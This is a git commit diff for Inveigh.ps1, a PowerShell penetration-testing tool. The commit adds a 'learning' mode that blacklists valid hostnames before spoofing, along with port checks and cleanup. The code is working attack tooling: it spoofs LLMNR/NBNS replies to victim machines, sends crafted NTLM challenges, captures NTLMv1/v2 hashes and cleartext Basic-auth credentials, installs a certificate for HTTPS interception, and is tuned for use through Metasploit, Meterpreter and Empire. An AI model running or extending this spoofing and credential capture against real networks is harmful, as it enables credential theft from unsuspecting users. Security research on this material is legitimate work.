aboutsummaryrefslogtreecommitdiff
path: root/Scripts/Inveigh.ps1
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2016-09-08 21:35:47 -0400
committerKevin Robertson <robertsonk@gmail.com>2016-09-08 21:35:47 -0400
commitfbd2514aca26c6f2f986454e089afdec33170379 (patch)
tree4be644449bd8c7ebfd4eccfdfc6b74ec9c299c5c /Scripts/Inveigh.ps1
parent4badd2dc5b5fde4f214f07b87d99e5950f66ff53 (diff)
downloadInveigh-fbd2514aca26c6f2f986454e089afdec33170379.tar.gz
Inveigh-fbd2514aca26c6f2f986454e089afdec33170379.zip
1.2 Prep
Added a learning mode (SpooferLearning parameter) to Invoke-Inveigh that will attempt to avoid spoofing requests for valid hostnames. If enabled, Inveigh will send out LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS requests. If Inveigh receives a response for a sent requests, it will add the hostname to a blacklist. Refined the Invoke-InveighPrivileged web server. Performed some general cleanup on all functions.
Diffstat (limited to 'Scripts/Inveigh.ps1')
-rw-r--r--Scripts/Inveigh.ps1636
1 files changed, 455 insertions, 181 deletions
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index e4c77a0..92092b2 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -35,6 +35,19 @@ Default = All: Comma separated list of source IP addresses to respond to when sp
.PARAMETER SpooferIPsIgnore
Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+.PARAMETER SpooferLearning
+Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out
+LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the
+hostname to a spoofing blacklist.
+
+.PARAMETER SpooferLearningDelay
+(Interger) Set the amount of time in minutes that Inveigh will delay spoofing while valid hosts are being
+blacklisted through SpooferLearning.
+
+.PARAMETER SpooferLearningInterval
+Default = 30 Minutes: (Interger) Set the amount of time in minutes that Inveigh wait before sending out
+a LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
+
.PARAMETER SpooferRepeat
Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
challenge/response has been captured.
@@ -170,8 +183,9 @@ Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
.PARAMETER Tool
-Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's
-Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
.EXAMPLE
Import-Module .\Inveigh.psd1;Invoke-Inveigh
@@ -227,6 +241,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y",
@@ -257,6 +272,8 @@ param
[parameter(Mandatory=$false)][Int]$NBNSTTL="165",
[parameter(Mandatory=$false)][Int]$WPADPort="",
[parameter(Mandatory=$false)][Int]$RunTime="",
+ [parameter(Mandatory=$false)][Int]$SpooferLearningDelay="",
+ [parameter(Mandatory=$false)][Int]$SpooferLearningInterval="30",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS",
[parameter(Mandatory=$false)][String]$HTTPDefaultFile="",
[parameter(Mandatory=$false)][String]$HTTPDefaultEXE="",
@@ -327,6 +344,8 @@ if(!$inveigh)
$inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
$inveigh.cleartext_list = New-Object System.Collections.ArrayList
$inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
+ $inveigh.valid_host_list = New-Object System.Collections.ArrayList
}
if($inveigh.running)
@@ -336,34 +355,38 @@ if($inveigh.running)
$inveigh.sniffer_socket = $null
-if($inveigh.HTTP_listener.IsListening)
+if($inveigh.HTTP_listener.IsListening -and !$inveigh.relay_running)
{
$inveigh.HTTP_listener.Stop()
$inveigh.HTTP_listener.Close()
}
-$inveigh.console_queue = New-Object System.Collections.ArrayList
-$inveigh.status_queue = New-Object System.Collections.ArrayList
-$inveigh.log_file_queue = New-Object System.Collections.ArrayList
-$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
-$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
-$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
-$inveigh.certificate_application_ID = $HTTPSCertAppID
-$inveigh.certificate_thumbprint = $HTTPSCertThumbprint
-$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
-$inveigh.console_output = $false
-$inveigh.console_input = $true
-$inveigh.file_output = $false
-$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
-$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
-$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
-$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
-$inveigh.HTTP_response = $HTTPResponse
-$inveigh.HTTP_directory = $HTTPDir
-$inveigh.HTTP_default_file = $HTTPDefaultFile
-$inveigh.HTTP_default_exe = $HTTPDefaultEXE
-$inveigh.WPAD_response = $WPADResponse
-$inveigh.challenge = $Challenge
+if(!$inveigh.relay_running -or !$inveigh.unprivileged_running)
+{
+ $inveigh.console_queue = New-Object System.Collections.ArrayList
+ $inveigh.status_queue = New-Object System.Collections.ArrayList
+ $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+ $inveigh.certificate_application_ID = $HTTPSCertAppID
+ $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
+ $inveigh.console_output = $false
+ $inveigh.console_input = $true
+ $inveigh.file_output = $false
+ $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+ $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+ $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.HTTP_response = $HTTPResponse
+ $inveigh.HTTP_directory = $HTTPDir
+ $inveigh.HTTP_default_file = $HTTPDefaultFile
+ $inveigh.HTTP_default_exe = $HTTPDefaultEXE
+ $inveigh.WPAD_response = $WPADResponse
+ $inveigh.challenge = $Challenge
+}
+
$inveigh.running = $true
if($StatusOutput -eq 'Y')
@@ -393,7 +416,7 @@ if($Inspect)
$SMB = "N"
}
-if($Tool -eq 1) # Metasploit Interactive PowerShell
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
{
$inveigh.tool = 1
$inveigh.output_stream_only = $true
@@ -431,13 +454,13 @@ $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null
if($LLMNR -eq 'Y')
{
- $inveigh.status_queue.Add("LLMNR Spoofing Enabled") > $null
+ $inveigh.status_queue.Add("LLMNR Spoofing = Enabled") > $null
$inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
$LLMNR_response_message = "- spoofed response has been sent"
}
else
{
- $inveigh.status_queue.Add("LLMNR Spoofing Disabled") > $null
+ $inveigh.status_queue.Add("LLMNR Spoofing = Disabled") > $null
$LLMNR_response_message = "- LLMNR spoofing is disabled"
}
@@ -447,11 +470,11 @@ if($NBNS -eq 'Y')
if($NBNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output = Enabled") > $null
}
$inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
@@ -459,14 +482,46 @@ if($NBNS -eq 'Y')
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing Disabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofing = Disabled") > $null
$NBNS_response_message = "- NBNS spoofing is disabled"
}
+if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+ $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null
+
+ if($SpooferLearningDelay -eq 1)
+ {
+ $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
+ }
+ elseif($SpooferLearningDelay -gt 1)
+ {
+ $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
+ }
+
+ if($SpooferLearningInterval -eq 1)
+ {
+ $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
+ }
+ elseif($SpooferLearningInterval -eq 0)
+ {
+ $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null
+ }
+ elseif($SpooferLearningInterval -gt 1)
+ {
+ $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
+ }
+
+}
+
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
$inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null
}
+else
+{
+ $SpooferHostsReply = $false
+}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
@@ -486,7 +541,7 @@ if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
if($SpooferRepeat -eq 'N')
{
$inveigh.spoofer_repeat = $false
- $inveigh.status_queue.Add("Spoofer Repeating Disabled") > $null
+ $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null
}
else
{
@@ -495,54 +550,78 @@ else
if($SMB -eq 'Y')
{
- $inveigh.status_queue.Add("SMB Capture Enabled") > $null
+ $inveigh.status_queue.Add("SMB Capture = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("SMB Capture Disabled") > $null
+ $inveigh.status_queue.Add("SMB Capture = Disabled") > $null
}
if($HTTP -eq 'Y')
{
- $inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTP Capture Enabled") > $null
+
+ $HTTP_port_check = netstat -ap TCP | findstr 0.0.0.0:80
+
+ if($HTTP_port_check)
+ {
+ $inveigh.HTTP = $true
+ $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null
+ }
+ else
+ {
+ $inveigh.HTTP = $true
+ $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
+ }
+
}
else
{
$inveigh.HTTP = $false
- $inveigh.status_queue.Add("HTTP Capture Disabled") > $null
+ $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
}
if($HTTPS -eq 'Y')
{
- try
+ $HTTPS_port_check = netstat -ap TCP | findstr 0.0.0.0:443
+
+ if($HTTPS_port_check)
{
- $inveigh.HTTPS = $true
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
- $certificate.Import($PWD.Path + "\Inveigh.pfx")
- $certificate_store.Add($certificate)
- $certificate_store.Close()
- $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
- $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
- $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
- & "netsh" $netsh_arguments > $null
- $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null
+ $inveigh.HTTP = $true
+ $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null
}
- catch
+ else
{
- $certificate_store.Close()
- $HTTPS="N"
- $inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null
+
+ try
+ {
+ $inveigh.HTTPS = $true
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
+ $certificate.Import($PWD.Path + "\Inveigh.pfx")
+ $certificate_store.Add($certificate)
+ $certificate_store.Close()
+ $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
+ $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
+ $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
+ & "netsh" $netsh_arguments > $null
+ $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null
+ }
+ catch
+ {
+ $certificate_store.Close()
+ $HTTPS="N"
+ $inveigh.HTTPS = $false
+ $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null
+ }
+
}
}
else
{
- $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null
+ $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null
}
if($inveigh.HTTP -or $inveigh.HTTPS)
@@ -568,7 +647,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
if($HTTPResponse)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Custom Response Enabled") > $null
+ $inveigh.status_queue.Add("HTTP/HTTPS Custom Response = Enabled") > $null
}
if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
@@ -578,7 +657,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
if($WPADIP -and $WPADPort)
{
- $inveigh.status_queue.Add("WPAD Response Enabled") > $null
+ $inveigh.status_queue.Add("WPAD Response = Enabled") > $null
$inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
if($WPADDirectHosts)
@@ -599,16 +678,13 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
}
elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
{
- $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null
+ $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
$inveigh.WPAD_response = $WPADResponse
}
- else
+ elseif($WPADEmptyFile -eq 'Y')
{
- if($WPADEmptyFile -eq 'Y')
- {
- $inveigh.status_queue.Add("WPAD Default Response Enabled") > $null
- $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}"
- }
+ $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
+ $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}"
}
if($Challenge)
@@ -620,7 +696,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
if($MachineAccounts -eq 'N')
{
- $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null
+ $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
$inveigh.machine_accounts = $false
}
else
@@ -630,7 +706,7 @@ else
if($ConsoleOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null
+ $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
$inveigh.console_output = $true
if($ConsoleStatus -eq 1)
@@ -652,7 +728,7 @@ else
}
else
{
- $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null
+ $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
}
}
@@ -668,13 +744,13 @@ else
if($FileOutput -eq 'Y')
{
- $inveigh.status_queue.Add("Real Time File Output Enabled") > $null
+ $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
$inveigh.status_queue.Add("Output Directory = $output_directory") > $null
$inveigh.file_output = $true
}
else
{
- $inveigh.status_queue.Add("Real Time File Output Disabled") > $null
+ $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
}
if($FileUnique -eq 'Y')
@@ -716,7 +792,7 @@ if($inveigh.status_output)
if($inveigh.output_stream_only)
{
Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- $inveigh.status_queue.RemoveRange(0,1)
+ $inveigh.status_queue.RemoveAt(0)
}
else
{
@@ -724,22 +800,28 @@ if($inveigh.status_output)
switch ($inveigh.status_queue[0])
{
+ "* Disabled Due To *"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveAt(0)
+ }
+
"Run Stop-Inveigh to stop Inveigh"
{
Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveRange(0,1)
+ $inveigh.status_queue.RemoveAt(0)
}
"Windows Firewall = Enabled"
{
Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveRange(0,1)
+ $inveigh.status_queue.RemoveAt(0)
}
default
{
Write-Output($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveRange(0,1)
+ $inveigh.status_queue.RemoveAt(0)
}
}
@@ -950,19 +1032,19 @@ $HTTP_scriptblock =
$inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00,0x05,0x82,0x89,0xa +
- $HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
- $HTTP_timestamp +
- 0x00,0x00,0x00,0x00,0x0a,0x0a
+ 0x00,0x00,0x00,0x05,0x82,0x89,0xa +
+ $HTTP_challenge_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+ 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+ 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+ 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+ 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+ 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+ 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+ 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+ 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ $HTTP_timestamp +
+ 0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = 'NTLM ' + $NTLM_challenge_base64
@@ -980,7 +1062,7 @@ $HTTP_scriptblock =
$inveigh.response = $inveigh.context.Response
$NTLM = 'NTLM'
$NTLM_auth = $false
- $Basic_auth = $false
+ $basic_auth = $false
if($inveigh.request.IsSecureConnection)
{
@@ -1021,12 +1103,12 @@ $HTTP_scriptblock =
$HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
$HTTP_request_time_old = $HTTP_request_time
- [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization')
+ [String]$authentication_header = $inveigh.request.headers.GetValues('Authorization')
if($authentication_header.StartsWith('NTLM '))
{
$authentication_header = $authentication_header -replace 'NTLM ',''
- [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
$inveigh.response.StatusCode = 401
if($HTTP_request_bytes[8] -eq 1)
@@ -1041,7 +1123,7 @@ $HTTP_scriptblock =
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
$inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
@@ -1152,7 +1234,7 @@ $HTTP_scriptblock =
elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code
{
$inveigh.response.StatusCode = 200
- $Basic_auth = $true
+ $basic_auth = $true
$authentication_header = $authentication_header -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)])
@@ -1167,38 +1249,38 @@ $HTTP_scriptblock =
}
- if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth)
+ if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
{
if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))
{
- [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
}
elseif($inveigh.HTTP_directory)
{
if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat')
{
- [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
}
elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))
{
- [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
}
elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat')
{
- [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
+ [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
}
else
{
if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
{
- [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
+ [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
}
else
{
- [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
+ [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
}
}
@@ -1220,12 +1302,12 @@ $HTTP_scriptblock =
$inveigh.message = $null
}
- [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+ [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
}
}
else
{
- [Byte[]] $HTTP_buffer = $null
+ [Byte[]]$HTTP_buffer = $null
}
if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth)
@@ -1254,7 +1336,7 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL)
+ param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL)
$byte_in = New-Object System.Byte[] 4
$byte_out = New-Object System.Byte[] 4
@@ -1273,6 +1355,8 @@ $sniffer_scriptblock =
[Array]::Reverse($LLMNR_TTL_bytes)
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
+ $LLMNR_learning_log = New-Object System.Collections.Generic.List[string]
+ $NBNS_learning_log = New-Object System.Collections.Generic.List[string]
if($RunTime)
{
@@ -1280,6 +1364,12 @@ $sniffer_scriptblock =
$sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
+ if($SpooferLearningDelay)
+ {
+ $spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay
+ $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
while($inveigh.running)
{
$packet_data = $inveigh.sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)
@@ -1329,9 +1419,9 @@ $sniffer_scriptblock =
SMBNTLMResponse $payload_bytes
}
- $client_IP = ''
- $client_port = ''
- $NTLM_challenge = ''
+ $client_IP = ""
+ $client_port = ""
+ $NTLM_challenge = ""
}
}
@@ -1347,9 +1437,9 @@ $sniffer_scriptblock =
SMBNTLMResponse $payload_bytes
}
- $client_IP = ''
- $client_port = ''
- $NTLM_challenge = ''
+ $client_IP = ""
+ $client_port = ""
+ $NTLM_challenge = ""
}
@@ -1406,14 +1496,14 @@ $sniffer_scriptblock =
137 # NBNS
{
- if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP)
+ if([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01')
{
- $UDP_length[0] += 16
+ $UDP_length[0] += 12
